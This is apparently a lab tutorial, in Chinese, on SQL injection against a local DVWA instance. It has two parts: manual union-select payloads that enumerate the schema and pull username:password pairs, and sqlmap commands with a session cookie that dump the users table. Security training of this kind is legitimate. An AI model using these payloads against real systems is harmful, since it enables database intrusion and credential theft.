low級别(手工注入 和 sqlmap工具注入)
**
手動注入
**
1.判斷是否存在注入,注入的類型是字元型還是數字型
輸入1:(輸入1-5都會傳回正确的值)
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHLxUkaNdXTq5UeRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnLwEzM5MDN1YTM2ITNwAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
輸入 1’(發現報錯,存在注入漏洞)
Id是被’ ‘包括起來的,是屬于字元型注入
閉合 輸入 1’ and ‘1’=’1(查詢成功,會傳回正确的值)
輸入1’ or ‘1’=’1 時,因為這個式子是永真的,傳回了所有結果。
2.猜測sql查詢語句中的字段數
1’ order by 3#
1’ order by 2#
3.确定顯示的字段順序
0’ union select 1,2#
4.擷取目前使用者,資料庫,版本号
0’ union select 1,concat(user(),database(),version())#
5.擷取表名
0’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
6.擷取字段名
0’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
7.擷取字段值
0’ union select 1,group_concat(user,0x3a,password) from users#
**
sqlmap工具注入
**
用到的參數
-u URL, --url=URL :指定URL
–cookie=COOKIE :HTTP Cookie header值
–dbs :枚舉資料庫管理系統資料庫
–tables :枚舉DBMS資料庫中的表
–columns :枚舉DBMS資料庫表列
-D DB :要進行枚舉的指定資料庫名
-T TBL :DBMS資料庫表枚舉
-C COL :DBMS資料庫表列枚舉
–dump :z轉儲資料庫表項
1.檢視有無注入點
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
有一個302跳轉,跳轉到的是登入頁面,是以這個時候需要用cookie進行會話維持,然後用burpsuite或者f12,找到cookie
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho”
存在注入
2.擷取資料庫名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” --dbs
3.擷取dvwa資料庫中表名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa --tables
4.擷取dvwa資料庫中users表中的字段名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --columns
5.擷取user,password的值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users -C user,password --dump
6.擷取所有字段值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --dump